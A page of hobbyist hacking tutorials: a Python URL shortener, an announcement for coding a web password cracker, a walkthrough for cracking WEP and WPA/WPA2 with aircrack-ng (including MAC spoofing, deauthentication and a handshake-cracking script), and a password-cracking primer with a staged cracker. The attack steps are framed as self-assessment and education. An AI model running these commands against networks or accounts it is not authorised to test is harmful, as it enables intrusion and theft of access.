Tuesday, 5 September 2017


HOW TO: Shorten URLs from the Command Line with Python

Shortening URLs has become a necessity in this age of Twitter and limited-character status updates. It not only allows us to cram more words into our oh-so-important Twitter statuses, but it also helps us with a few other things.
Some Benefits of URL Shorteners
We can create temporary URLs. Some shorteners expire a link after a certain period of inactivity, which is handy for a link we only want to show to a group of friends quickly.
Some URL shortening services allow analysis of link traffic (Google and Bitly come to mind). This can be good for website owners, or people who make money off of webhits. It could help them analyze where their traffic is coming from for a particular link, rather than analyze a website as a whole.
Posting longer status updates. People like me who use Twitter to promote their blog, or users who post links to news require every precious letter possible. Links tend to take up quite a few characters, so having URL shortener can be a godsend. It allows us to get our point across without spiraling downward into incoherent e-gibberish.
I often want to shorten my URLs from the command line. Opening another browser tab can take up too many resources for my liking. It also can load rather slow, and the JavaScript on the page that loads the shortened URL will often load improperly and not display the new URL. A URL shortener from the command line could also potentially allow us to convert big lists of links, as well as single ones, in a quick and simple manner. This Null Byte will help us do just that! Let's hack together some code in the Python programming language to shorten our URLs from the command line. This will go great in conjunction with our newly made Twitter command-line application.

Requirements

Python installed on your system.
Picking Our API
First off, we need to pick which API our Python application is going to talk to. An API (Application Programming Interface) is the defined way to drive a web application from code: a specific set of endpoints, request formats and responses that our program must comply with.
After a bit of research, the easiest API was the Google URL shortener (goo.gl). I picked it because, at the time, it required no registration, no account and no API key, which keeps everything simple so you can easily understand it. (Google has since shut goo.gl down; it stopped accepting new URLs in 2018, so the same pattern now has to be pointed at another shortener's API.)
Code the Application
Here is what I came up with for a finished, cleanly coded and simplistic result. I named it url.py.
Grab the source code here.
To use the program, we simply type the following command into a terminal while in the same directory as the saved url.py source code.
    python url.py "http://paste.url/between/quotes.kthx"
Code Breakdown
In the main function, the line starting with gurl = simply "curls" (fetches) the API URL with our long URL attached. This is essentially all that we need.
The lines above it assign the variables needed: the URL taken from the command line and the API endpoint it is appended to.
The data returned by the Goo.gl API, which contains the new short link, is printed out to the screen.
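Since the original url.py survives on this page only as an image, here is an added example of the same tool, written for Python 3; it is not the author's script. The endpoint API_URL and the response field SHORT_KEY are assumptions modelled on the old goo.gl JSON API (POST a {"longUrl": ...} body, read the short link back from the "id" field); point them at whatever shortener you actually use. The script also does the two checks a practitioner wants from a tool like this: it only submits absolute http(s) URLs (no javascript:, file: or data: links) and it parses the reply as JSON rather than printing whatever comes back.

```python
#!/usr/bin/env python3
"""Shorten one or many URLs from the command line.

Added example, not the original url.py. API_URL and SHORT_KEY are
assumptions: the shortener is assumed to accept a POST with a JSON body
{"longUrl": ...} and to answer with a JSON object whose "id" field holds
the short link (the shape of the retired goo.gl API). Change both for the
service you use.
"""
import json
import sys
import urllib.request
from urllib.parse import urlparse

API_URL = "https://example.invalid/urlshortener/v1/url"  # placeholder endpoint (assumption)
SHORT_KEY = "id"                                          # response field holding the short URL
ALLOWED_SCHEMES = ("http", "https")


def validate_url(url):
    """Accept only absolute http(s) URLs.

    Refusing javascript:, file:, data: and scheme-less input keeps the tool
    from minting short links to things that should never be clicked, and
    rejects bare hostnames that a shortener would silently mangle.
    """
    parts = urlparse(url.strip())
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("refusing URL with scheme %r" % parts.scheme)
    if not parts.netloc:
        raise ValueError("URL has no host: %r" % url)
    return parts.geturl()


def build_shorten_request(long_url, api_url=API_URL):
    """Build the POST request without sending it, so it can be inspected."""
    body = json.dumps({"longUrl": validate_url(long_url)}).encode("utf-8")
    return urllib.request.Request(
        api_url,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def parse_shorten_response(body, short_key=SHORT_KEY):
    """Pull the short link out of the JSON reply.

    The reply is parsed with json.loads, never eval(); anything other than
    a JSON object carrying an http(s) link is treated as an error.
    """
    try:
        doc = json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, ValueError) as exc:
        raise ValueError("shortener returned non-JSON data: %s" % exc)
    if not isinstance(doc, dict) or short_key not in doc:
        raise ValueError("shortener reply lacks %r: %r" % (short_key, doc))
    return validate_url(doc[short_key])  # don't echo an untrusted string blindly


def shorten(long_url, opener=urllib.request.urlopen, timeout=10):
    """Shorten one URL. `opener` is injectable so the logic can be tested offline."""
    with opener(build_shorten_request(long_url), timeout=timeout) as resp:
        return parse_shorten_response(resp.read())


def main(argv):
    """python url.py URL [URL ...]   or   python url.py - < list_of_urls.txt"""
    targets = argv[1:] or ["-"]
    if targets == ["-"]:
        targets = [line for line in sys.stdin.read().splitlines() if line.strip()]
    status = 0
    for url in targets:
        try:
            print("%s\t%s" % (url, shorten(url)))
        except (ValueError, OSError) as exc:
            print("error: %s: %s" % (url, exc), file=sys.stderr)
            status = 1
    return status


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Feeding a file of links through stdin with `python url.py - < links.txt` covers the "big lists of links" case; each line comes back as `long URL <tab> short URL`, so the output drops straight into a spreadsheet or another script. Remember that whatever shortener you use sees every URL you submit, and that a short link hides its destination from the people who click it, which is exactly why phishers like them.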
If you think coding looks cool, maybe you should try to join the Community Byte activities that we host weekly here at Null Byte.


COMMUNITY BYTE: Coding a Web-Based Password Cracker in Python

Welcome to another Community Byte announcement! In the past two sessions, we have coded an IRC bot in Python capable of issuing commands. Since it can issue commands and most of you are new to programming, that project will stay idle for a while. Other commands such as voice and half-op can be easily hacked in via common sense, even if you weren't there for that session.
This week, I have something a bit more fun planned. We are all going to create a Python program to crack web-based passwords, like the ones you would see on an email or router login. This is going to be a very general and uniform password cracker, which should then be potentially modifiable to work for anything with a login on your browser.
Pretty cool, eh? To join this Community Byte, you have to pinky-swear that you'll join and idle in IRC forever! Just kidding.

Prerequisites

  • Python 2.7 installed on your computer.
  • An IRC client, like XChat.
  • Gobby, a real-time collaborative code editor.

How does this work?

We will be using IRC to round people up before we start to code. In IRC, I will assist whoever needs help connecting to the Gobby session. If you're new to IRC, go here to learn how to set it up and use it. I will be hosting a Gobby server for everyone to connect to, which allows us all to code in real-time, with everyone able to view and learn the code as we go along. Gobby makes coding with friends over long distance fun and easy.

When does it start?

The coding will take place every Friday at 5:00 pm PST, so be in IRC around that time. At the end of each session, I will post the code to the forums, and write a post about how it works, and what our code can do!

Project goals

  • The program can at least crack our test page.
  • Modular programming and variable-based so the tool can be hacked easily.
  • Everyone will learn a bit of Python.
  • Bring the community together and teach each other new things!
  • Get more people in IRC.
Get everyone you can to join IRC and start posting in the forums! Don't be shy, we don't bite, and the more people who idle 24/7, the more fun it is for all of us! I'm always there, so come say hello.





HOW TO: How Hackers Steal Your Internet & How to Defend Against It



I have had a lot of people ask me, "How does my neighbor keep getting into my wireless?!". Chances are, these people are all using WEP, a deprecated wireless encryption protocol. Either that, or they are using a weak WPA passphrase.
If someone can access your wireless network that easily, this is NOT a good thing. After someone cracks an access point, the possibilities are limitless. There's SSL stripping, packet sniffing, MITM (Man-In-The-Middle) attacks, ARP poisoning, not to mention hiding behind your connection, since anything they do online traces back to your IP address.

Proof of Concept

The theory behind cracking access points is simple. For WEP, you fake an authentication with the AP (Access Point) so that it accepts frames from your MAC address, then capture an encrypted ARP request and replay it at the AP over and over. Every time the AP rebroadcasts the replayed frame it uses a fresh initialization vector (IV), so the capture fills up with IVs quickly. An attacker collects as many IVs as they can, then runs a statistical attack (FMS/KoreK, or PTW in current aircrack-ng) against them. WEP is algorithmically weak: after enough IVs the RC4 key falls out, no matter how long and no matter how random it is.
WPA/WPA2 is a little different. To crack a WPA/WPA2 AP, you send a de-authentication frame to a connected client and force it to re-authenticate. When it does, capture the four-way handshake between them. The handshake does not carry the passphrase or a hash of it; it carries the two nonces and a MIC computed with a key derived from the passphrase and the SSID, which is exactly enough to check a guess. This means that once the handshake is captured, you can do all your attacking offline.
WPA/WPA2 fixed the weakness that was in WEP and requires a passphrase of at least 8 characters. That makes brute-forcing nearly impossible, so a dictionary attack is the only practical way to go. A dictionary attack uses a pre-generated list of words and tries each one, one by one. These don't necessarily have to be words, but any pre-generated strings of ASCII characters.
In this Null Byte, I'm going to show you how to break into your own wireless network and assess its security so you can have an impenetrable network! This will be done in Linux, because Windows does not have open-source, injection-capable drivers (WinPcap and USB wireless interfaces aside). For instructions on getting packet-injection-capable drivers in Linux, you will find a lovely tutorial, written by me for Null Byte, here.
All of the commands in bold are Terminal commands.

Step 1 Spoofing a MAC Address

Before any smart cracker attacks your AP, they will always spoof their MAC (Media Access Control) address! Your MAC address is your wireless NIC's (Network Interface Card) unique identity! UNIQUE. That means if the card was paid for with Mommy and Daddy's credit card, they'll know it's you behind the computer.
To spoof a MAC address, open a terminal and use these commands:
    sudo ifconfig wlan0 down
    sudo ifconfig wlan0 hw ether 46:75:63:6b:55:21
    sudo ifconfig wlan0 up
A frequent cracker would likely make a script out of this to do it quickly. You can put almost any hex value there for the MAC address you're spoofing to (keep the first octet even so the address is unicast, and avoid all-zeros); mine is just an example.
To make sure your MAC changed, you would do:
    ifconfig
Then confirm that the "wlan0" interface matches what we put into the terminal.
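The step above mentions turning this into a script. Here is an added one, not from the article, that picks a random locally administered MAC (bit 0x02 of the first octet set, the 0x01 multicast bit clear, so it never collides with a vendor-assigned address), applies it with ip link (the iproute2 equivalent of the ifconfig commands above) and then reads /sys/class/net/<iface>/address back to confirm the kernel actually took the change, which is the check "ifconfig and eyeball it" skips. The interface name and an optional MAC come from the command line; only the apply step needs root.

```sh
#!/bin/sh
# Added example (not from the article): randomise a wireless NIC's MAC
# before assessing an AP, then verify the kernel really took the change.
# Assumes iproute2 (ip) and /dev/urandom; the interface name is argv[1].

HEXPAIR='[0-9a-fA-F][0-9a-fA-F]'

# Print a random MAC that is locally administered (bit 1 of the first
# octet set) and unicast (bit 0 clear).
random_mac() {
    tail5=$(od -An -N5 -tx1 /dev/urandom | tr -s ' ' ':' | sed 's/^://')
    first=$(od -An -N1 -tu1 /dev/urandom | tr -d ' ')
    first=$(( (first & 0xfc) | 0x02 ))
    printf '%02x:%s\n' "$first" "$tail5"
}

# Return 0 only for a well-formed, locally administered, unicast MAC.
is_local_unicast_mac() {
    case "$1" in
        $HEXPAIR:$HEXPAIR:$HEXPAIR:$HEXPAIR:$HEXPAIR:$HEXPAIR) ;;
        *) return 1 ;;
    esac
    first=$(( 0x$(printf '%s' "$1" | cut -c1-2) ))
    [ $(( first & 0x03 )) -eq 2 ]
}

# Apply a MAC (random if none given) to IFACE and read it back from sysfs.
# Needs root; this is the ip(8) form of the ifconfig sequence above.
spoof_mac() {
    iface=$1
    mac=${2:-$(random_mac)}
    mac=$(printf '%s' "$mac" | tr 'A-F' 'a-f')   # sysfs reports lowercase
    is_local_unicast_mac "$mac" || { echo "refusing bad MAC $mac" >&2; return 1; }
    ip link set dev "$iface" down
    ip link set dev "$iface" address "$mac"
    ip link set dev "$iface" up
    current=$(cat "/sys/class/net/$iface/address")
    if [ "$current" != "$mac" ]; then
        echo "MAC unchanged on $iface (kernel reports $current)" >&2
        return 1
    fi
    echo "$iface is now $mac"
}

# Usage: sudo ./spoofmac.sh wlan0 [aa:bb:cc:dd:ee:ff]
if [ "$#" -gt 0 ]; then
    spoof_mac "$@"
fi
```

Run it as `sudo ./spoofmac.sh wlan0` for a random address or `sudo ./spoofmac.sh wlan0 46:75:63:6b:55:21` to use a specific one; a non-zero exit means either the address was malformed or the driver silently refused it, which some USB adapters do.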

Step 2 Finding Your AP

To find your AP, do a scan of local wireless APs:
    sudo iwlist wlan0 scan
Take note of the MAC address of the access point, as well as the channel it is on, you will need it later.

Step 3 Install Aircrack-NG

Install the aircrack-ng suite. It contains all the tools needed to assess your AP's security. In Arch Linux, it is:
    sudo pacman -S aircrack-ng 
And Ubuntu:
    sudo apt-get install aircrack-ng
Older guides also install a separate aircrack-ng-scripts package, because without it you sometimes couldn't run airmon-ng, etc. from the terminal. On current Debian, Ubuntu and Arch the scripts ship inside the aircrack-ng package itself, so only run these if airmon-ng is missing after the step above:
    sudo pacman -S aircrack-ng-scripts
And Ubuntu:
    sudo apt-get install aircrack-ng-scripts

Step 4 Cracking the Wireless AP

Now we are going to start the actual attack on the AP. You will need to replace the text in brackets with your corresponding info, which you should have written down.
Put your wireless interface into monitor mode, as this will allow it to sniff traffic:
    sudo airmon-ng start wlan0
-OR- (with the interface brought down first, as in Step 1)
    sudo iwconfig wlan0 mode monitor
Your monitoring interface should now be named "mon0". Newer versions of airmon-ng name it "wlan0mon" instead, and the iwconfig route leaves the name as "wlan0"; whichever name you end up with is what goes in place of mon0 in the commands below.
If you have a WEP encrypted network, refer to "Cracking WEP" below. If you have a WPA or WPA2 network, skip this and go straight to "Cracking WPA & WPA2".

Cracking WEP

For WEP encryption, start by capturing traffic for your AP only. The --ivs flag keeps just the IVs, which is all aircrack-ng needs, and -w takes a file name prefix, so this writes ~/Desktop/wep-01.ivs:
    sudo airodump-ng --ivs -c [channel of AP] --bssid [AP's MAC address] -w ~/Desktop/wep mon0
Next, open another tab in your terminal and fake-authenticate with the AP so that it accepts injected frames from your MAC (note: if you can't authenticate, spoof your MAC to match one of the clients already connected to it. You can see them under "STATION" in airodump-ng):
    sudo aireplay-ng -1 0 -a [AP's MAC] -e [AP's ESSID (name)] -h [Your MAC] mon0
When you have fake-authenticated successfully, start the ARP request replay attack, which re-injects captured ARP requests so the AP keeps generating fresh IVs:
    sudo aireplay-ng -3 -b [AP's MAC] -h [Your MAC] mon0
Once it picks up an ARP request, you should see the "#Data" column climbing rapidly in the airodump-ng window. After 20,000 to 100,000 data packets (the upper end for a 104-bit key), you should be ready to crack the key. You can start aircrack-ng while the capture is still running; it re-reads the file as IVs come in.
To crack your key, run this in the terminal:
     sudo aircrack-ng ~/Desktop/wep-01.ivs
When aircrack-ng says "KEY FOUND!", copy the key and remove the colons from it. Congratulations! You just proved how easy it is for someone to crack your network. With a crafted tool, an attacker can crack your network in less than 60 seconds. I've done it numerous times.

Cracking WPA & WPA2

To get ready to capture a four-way handshake, start airodump-ng with this command (-w takes a prefix, so the capture lands in ~/Desktop/psk-01.cap):
    sudo airodump-ng -c [channel of AP] --bssid [AP's MAC] -w ~/Desktop/psk mon0
Now we need to de-authenticate a client to force it to reconnect and get a four-way handshake faster. Switch to airodump-ng and look at the associated clients (listed at the bottom under STATION). Copy the MAC address. If there aren't any, wait until someone connects, or try again later when you can have another computer connected. Here is the terminal command to force de-authentication (run it in a second tab while airodump-ng keeps capturing):
    sudo aireplay-ng -0 15 -a [AP MAC] -c [Deauth client MAC] mon0
In airodump-ng, you should see "WPA handshake:" followed by the AP's MAC address in the top-right corner. Example:
The handshake was captured and you can now disconnect from the network. If you didn't get the handshake, you might not be close enough to the client.
To crack the handshake:
    sudo aircrack-ng -w [~/path/to/dictionary/file.lst] [~/Desktop/psk-01.cap]
You can find great dictionaries for cracking on ThePirateBay or Packet Storm. I have over 20, depending on my situation. You can also use coWPAtty with precomputed tables (made with its genpmk tool) to speed things up. WPA derives its key (the PMK) from the passphrase and the SSID, so the expensive part of each guess can be done in advance, but only for the exact SSIDs the table was built for, which is why such tables target common default names. The Church of Wi-Fi has the best table set I've seen. However, the torrents are impossible to find now (due to lack of seeders). In order to get them, you need to buy the DVD set.
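The cracking step in the aircrack-ng command above is easy to picture but easy to misdescribe, so here is an added example (not aircrack-ng's code) that does the same work in Python: for every wordlist entry it derives the PMK with PBKDF2-HMAC-SHA1 (passphrase, SSID as salt, 4096 rounds), expands it to the PTK with the 802.11i PRF, and recomputes the MIC over EAPOL message 2 with the KCK; a match means the guess is the passphrase. It also shows why the SSID matters for precomputed tables: the PMK is a function of both. All inputs are constructed in the script (SSID "NullByte", made-up MAC addresses and nonces, a message 2 frame built in the standard EAPOL-Key layout with the MIC at byte offset 81, a six-word wordlist), so it runs without a .cap file; none of those values come from a real capture.

```python
#!/usr/bin/env python3
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example (not aircrack-ng's code): it reproduces the check aircrack-ng
performs for each wordlist entry. The SSID, MAC addresses, nonces, wordlist
and the EAPOL message 2 frame are all constructed below so the script runs
without a capture file. The frame layout is the standard EAPOL-Key format
(4-byte 802.1X header + key descriptor), which puts the MIC at offset 81.
"""
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # 802.1X hdr(4) + type(1) info(2) len(2) replay(8) nonce(32) iv(16) rsc(8) id(8)
MIC_LEN = 16


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).

    The SSID is the salt, which is why precomputed PMK tables only work for
    the SSIDs they were generated for.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK for CCMP is 48 bytes: KCK(16) | KEK(16) | TK(16). Only the KCK checks the MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, eapol):
    """Key descriptor version 2: HMAC-SHA1 over the frame with the MIC zeroed, cut to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack_handshake(hs, wordlist):
    """Per candidate: PMK -> PTK -> KCK, recompute the MIC, compare with the captured one."""
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:      # WPA passphrases are 8-63 characters; skip the rest
            continue
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if eapol_mic(kck, hs["eapol"]) == captured_mic:
            return candidate
    return None


# --- constructed sample handshake (stands in for airodump-ng's psk-01.cap) ---
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK, CCMP


def build_eapol_msg2(snonce, mic=b"\x00" * MIC_LEN, key_data=RSN_IE):
    """EAPOL-Key message 2 of 4 (STA -> AP) in on-the-wire layout."""
    body = (struct.pack(">BHH", 2, 0x010a, 16)   # descriptor 2 (RSN); key info: v2|pairwise|MIC; key len
            + (1).to_bytes(8, "big")              # replay counter
            + snonce                              # 32-byte SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, key ID (unused in msg 2)
            + mic
            + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 1, 3, len(body)) + body   # 802.1X: version 1, type 3 (EAPOL-Key), length


def make_sample_handshake(passphrase, ssid="NullByte"):
    ap_mac = bytes.fromhex("001122334455")               # made-up AP address
    sta_mac = bytes.fromhex("4675636b5521")              # the spoofed address from Step 1
    anonce = hashlib.sha256(b"anonce").digest()          # deterministic stand-ins for random nonces
    snonce = hashlib.sha256(b"snonce").digest()
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    eapol = build_eapol_msg2(snonce, mic=eapol_mic(kck, build_eapol_msg2(snonce)))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol}


SAMPLE_HANDSHAKE = make_sample_handshake("password123")     # the secret the attacker does not know
WORDLIST = ["letmein", "qwerty123", "dragon", "password123", "trustno1", "iloveyou"]  # constructed

if __name__ == "__main__":
    print("KEY FOUND:", crack_handshake(SAMPLE_HANDSHAKE, WORDLIST))
```

The cost per guess is the 4096-round PBKDF2, not the MIC check, which is why a million-word list takes minutes on a CPU and why genpmk-style tables (PMKs precomputed for one SSID) or a GPU make such a difference; it is also why a random, unique SSID makes every shared table worthless against your network.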
That's all there is to it. So, the bottom line is to use WPA2 with AES (CCMP) encryption, give your network a unique SSID so that shared precomputed tables don't apply to it, and use an impossibly long passphrase, like "71zJJmfbK50VgdmtjRVJuxcDJr5PVJJAAtG1mIBwbEUshkkO".
Questions? Post below, or start a thread in the forum.



HACK LIKE A PRO: How to Crack Passwords, Part 1 (Principles & Technologies)



Welcome back, my neophyte hackers!
I have already done a few tutorials on password cracking, including ones for Linux and Windows, WEP and WPA2, and even online passwords using THC Hydra. Now, I thought it might be worthwhile to begin a series on password cracking in general. Password cracking is both an art and a science, and I hope to show you the many ways and subtleties involved.
We will start with the basic principles of password cracking that are essential to ALL password cracking techniques, followed by some of the tools and technologies used. Then, one by one, I will show you how to use those principles and technologies effectively to crack or capture the various types of passwords out there.

The Importance & Methods of Password Cracking

Passwords are the most widely used form of authentication throughout the world. A username and password are used on computer systems, bank accounts, ATMs, and more. The ability to crack passwords is an essential skill to both the hacker and the forensic investigator, the latter needing to hack passwords for accessing the suspect's system, hard drive, email account, etc.
Although some passwords are very easy to crack, some are very difficult. In those cases, the hacker or forensic investigator can either employ greater computing resources (a botnet, supercomputer, GPU, ASIC, etc.), or they can look to obtain the password in other ways.
These ways might include insecure storage. In addition, sometimes you don't need a password to access password-protected resources. For instance, if you can replay a cookie, session ID, a Kerberos ticket, an authenticated session, or other resource that authenticates the user after the password authentication process, you can access the password protected resource without ever knowing the password.
Sometimes these attacks can be much easier than cracking a complex and long password. I will do a tutorial on various replay attacks in the near future (look out specifically for my upcoming article on stealing the Facebook cookie to access someone's Facebook account).
Now, let's start with the basics.

Step 1Password Storage

In general, passwords are not stored in clear text. As a rule, passwords are stored as hashes. A hash is a one-way function: the same input always gives the same digest, but the digest cannot be reversed to recover the input, so the only way back is guessing. Older systems very often used plain MD5 or SHA-1 for this; newer ones use salted, deliberately slow hashes, which is what makes the attacks below expensive.
In the Windows operating system, local account passwords are stored in the SAM database, while Linux stores them in the /etc/shadow file. Both are readable only by someone with root/sysadmin privileges, so in both cases you need a process or file running with those privileges to grab the password data (e.g. DLL injection with samdump.dll in Windows).

Step 2Types of Attacks

Dictionary

A dictionary attack is the simplest and fastest password cracking attack. To put it simply, it just runs through a dictionary of words trying each one of them to see if they work. Although such an approach would seem impractical to do manually, computers can do this very fast and run through millions of words in a few hours. This should usually be your first approach to attacking any password, and in some cases, it can prove successful in mere minutes.

Rainbow Table

Most modern systems store passwords as hashes. This means that even if you can get to the area or file that stores the password, what you get is a hash, not the password itself. One approach to cracking it is to take a dictionary file, hash each word and compare it to the stored hash. This is very time- and CPU-intensive. A faster approach is a rainbow table: a precomputed, compressed table of hash chains built from a dictionary or character set, against which you simply look up the hash from the password file. If there is a match, you now know the password. Rainbow tables only work against unsalted hashes (LM, NTLM, plain MD5 and the like); a random per-user salt makes every stored hash different and the table useless.

Brute Force

Brute force is the most time-consuming approach to password cracking. It should always be your last resort. Brute force tries every combination of the letters, numbers and special characters that might make up a password. As you might expect, the more computing horsepower you have, the more successful you will be with this approach.

Hybrid

A hybrid password attack is one that uses a combination of dictionary words with special characters, numbers, etc. Often these hybrid attacks use a combination of dictionary words with numbers appending and prepending them, and replacing letters with numbers and special characters. For instance, a dictionary attack would look for the word "password", but a hybrid attack might look for "p@$$w0rd123".

Step 3Commonly Used Passwords

As much as we think each of us is unique, we do show some common patterns of behavior within our species. One of those patterns is the words we choose for passwords. There are number of wordlists that have been compiled of common passwords. In recent years, many systems have been cracked and passwords captured from millions of users. By using these already captured passwords, you are likely to find at least a few on the network you are trying to hack.

Step 4Password Cracking Strategy

Many newbies, when they start cracking passwords, simply choose a tool and word list and then turn them loose. They are often disappointed with the results. Expert password crackers have a strategy. They don't expect to be able to crack every password, but with a well-developed strategy, they can crack most passwords in a very short amount of time.
The key to developing a successful password cracking strategy is to work in multiple iterations, going after the easiest passwords in the first pass and moving on to the harder ones with a different technique in each later pass, so that the expensive attacks only ever run against what the cheap ones left behind.
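To make the iterations concrete, here is an added example (not John the Ripper's or any other tool's code) that runs a dictionary pass, then a hybrid pass with case, leetspeak and suffix rules, and only then a small brute-force pass, reporting which stage found each target. It also builds a plain hash-to-password lookup table to show why a salt defeats precomputation. The wordlist, the salt and the target hashes are constructed in the script; the hash functions are the fast, unsalted MD5/SHA-1 described in Step 1, which is exactly why all of this finishes in seconds.

```python
#!/usr/bin/env python3
"""Staged password cracking: dictionary -> hybrid -> brute force, plus the
effect of a salt on precomputed lookup tables.

Added example, not John the Ripper's or Ophcrack's code. The wordlist, the
targets and the salt are constructed here so the script runs offline.
"""
import hashlib
import itertools
import string

LEET = str.maketrans("aeios", "@310$")
SUFFIXES = ([""] + [str(n) for n in range(100)] + ["!", "123", "1234", "!1"]
            + [str(y) for y in range(1990, 2026)])


def hash_password(password, algo="sha1", salt=b""):
    """Hex digest of salt || password; salt=b"" is the unsalted case many old apps used."""
    return hashlib.new(algo, salt + password.encode()).hexdigest()


def dictionary_attack(target, wordlist, algo, salt=b""):
    """Phase 1: try each wordlist entry verbatim."""
    for word in wordlist:
        if hash_password(word, algo, salt) == target:
            return word
    return None


def hybrid_candidates(word):
    """Phase 2 mangling rules: case, leetspeak and common suffixes (password -> P@$$w0rd123)."""
    bases = {word, word.capitalize(), word.translate(LEET), word.capitalize().translate(LEET)}
    for base in sorted(bases):
        for suffix in SUFFIXES:
            yield base + suffix


def hybrid_attack(target, wordlist, algo, salt=b""):
    for word in wordlist:
        for cand in hybrid_candidates(word):
            if hash_password(cand, algo, salt) == target:
                return cand
    return None


def brute_force(target, algo, salt=b"", charset=string.ascii_lowercase + string.digits, max_len=3):
    """Phase 3: every string up to max_len over charset (kept tiny here: 36^3 = 46,656 guesses)."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            cand = "".join(combo)
            if hash_password(cand, algo, salt) == target:
                return cand
    return None


def crack_password(target, wordlist, algo="sha1", salt=b""):
    """Run the phases cheapest-first and report which one succeeded."""
    phases = (("dictionary", lambda: dictionary_attack(target, wordlist, algo, salt)),
              ("hybrid", lambda: hybrid_attack(target, wordlist, algo, salt)),
              ("brute", lambda: brute_force(target, algo, salt)))
    for name, attack in phases:
        found = attack()
        if found is not None:
            return name, found
    return None


def build_lookup_table(wordlist, algo="sha1"):
    """Precomputed hash -> password map (the idea behind rainbow tables, minus the chain trick).
    It only helps against unsalted hashes: the per-user salt is not part of the table."""
    return {hash_password(w, algo): w for w in wordlist}


# --- constructed inputs ---
WORDLIST = ["123456", "password", "letmein", "dragon", "monkey", "qwerty"]
SALT = bytes.fromhex("9a13c7e0")          # random per-user salt stored next to the hash
TARGETS = {
    "unsalted_sha1_dragon": hash_password("dragon"),
    "unsalted_sha1_hybrid": hash_password("P@$$w0rd123"),
    "unsalted_md5_brute": hash_password("zq9", "md5"),
    "salted_sha1_dragon": hash_password("dragon", salt=SALT),
}

if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("lookup table, unsalted hash:", table.get(TARGETS["unsalted_sha1_dragon"]))
    print("lookup table, salted hash:  ", table.get(TARGETS["salted_sha1_dragon"]))
    for name, digest in TARGETS.items():
        salt = SALT if name.startswith("salted") else b""
        algo = "md5" if "md5" in name else "sha1"
        print(name, "->", crack_password(digest, WORDLIST, algo, salt))
```

Note the asymmetry the salted case exposes: the lookup table misses, but a dictionary attack that knows the salt still wins immediately, so a salt buys you nothing against a fast hash once the attacker has the hash and the salt together. That is the argument for the slow, salted hashes mentioned in Step 1.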

Step 5Password Cracking Software

John

John the Ripper is probably the world's best known password cracking tool. It is strictly command line, and it runs on Linux, Windows and macOS. Its lack of a GUI makes it a bit more challenging to use, but its hand-optimized hashing code is what makes it such a fast password cracker.
One of the beauties of this tool is its built-in default cracking strategy. First it tries "single crack" mode, which builds guesses from the account's login name and GECOS information; then it runs wordlist mode with its mangling rules (the hybrid attack described above); and only if all of those fail will it fall back to "incremental" mode, its brute force.

Ophcrack

Ophcrack is a free rainbow table-based password cracking tool for Windows. It is among the most popular Windows password cracking tools (Cain and Abel is probably the most popular; see below), but can also be used on Linux and Mac systems.
It cracks LM and NTLM (Windows) hashes. For cracking Windows XP, Vista and Windows 7, you can download free rainbow tables. You can download Ophcrack on SourceForge, and you can get some free and premium rainbow tables for Ophcrack here.

L0phtCrack

L0phtCrack is an alternative to Ophcrack, and attempts to crack Windows passwords from hashes in the SAM file or the Active Directory (AD). It also uses dictionary and brute force attacks for generating and guessing passwords.
L0phtCrack was acquired by Symantec and they promptly discontinued it in 2006. Later, L0phtCrack developers re-acquired this excellent password cracking tool and re-released it in 2009. You can download the tool here.

Cain and Abel

Cain and Abel just might be the best known password cracking tool on the planet. Written strictly for Windows, it can crack numerous hash types, including NTLM, NTLMv2, MD5, wireless, Oracle, MySQL, SQL Server, SHA1, SHA2, Cisco, VoIP, and many others.
Cain and Abel can crack passwords using a dictionary attack, rainbow attack, and brute force. One of its better features is the ability to select the password length and character set when attempting a brute force attack. And besides being an excellent password cracking tool, it is also a great ARP Poisoning and MiTM tool.

THC-Hydra

THC-Hydra is probably the most widely used online hacking tool. It is capable of cracking web form authentication, and when used in conjunction with other tools such as Tamper Data, it can be a powerful and effective tool for cracking nearly every type of online password authentication mechanism.

Brutus

Brutus is an online password cracking tool that many consider the fastest online password cracker. It is a free Windows tool, and it supports password cracking in HTTP (Basic Authentication), HTTP (HTML Form/CGI), POP3, FTP, SMB, Telnet, and other types such as IMAP, NNTP, NetBus, etc.
Brutus has not been updated in quite a while, but it can still be useful. Brutus can be downloaded here.

Aircrack-Ng

In my humble opinion, aircrack-ng is undoubtedly the best all-around Wi-Fi hacking software available. It is capable of cracking both WEP and WPA2, and it is also capable of doing the following, among many other things.
